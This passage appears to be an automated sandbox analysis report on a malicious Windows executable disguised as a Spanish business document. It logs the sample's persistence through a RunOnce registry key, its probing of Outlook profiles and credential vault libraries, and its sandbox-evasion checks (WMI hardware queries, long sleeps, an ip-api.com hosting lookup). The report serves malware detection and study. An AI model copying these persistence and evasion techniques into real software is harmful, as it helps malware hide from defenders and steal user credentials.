      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeReversingLabs: Detection: 36%
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile read: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess created: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess created: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"Jump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: vaultcli.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Windows.Forms.pdb source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7581746956.000000007115B000.00000020.00000001.01000000.0000000B.sdmp
      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7581746956.000000007115B000.00000020.00000001.01000000.0000000B.sdmp
      Source: Binary string: System.Windows.Forms.ni.pdb source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7581746956.000000007115B000.00000020.00000001.01000000.0000000B.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.2974737603.00000000075B2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_001159C8 pushfd ; retn 000Ah3_2_00115A01
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_3877CB70 push esp; iretd 3_2_3877CF71
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile created: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile created: C:\Users\user\AppData\Roaming\Cretinous\Adjudanter.exeJump to dropped file
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MotorcyclistsJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MotorcyclistsJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MotorcyclistsJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MotorcyclistsJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeAPI/Special instruction interceptor: Address: 7ACB2E6
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeAPI/Special instruction interceptor: Address: 3B5B2E6
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeMemory allocated: 35D30000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeMemory allocated: 37D30000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeWindow / User API: threadDelayed 799Jump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe TID: 7908Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe TID: 7908Thread sleep time: -100000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe TID: 5248Thread sleep count: 799 > 30Jump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe TID: 7908Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
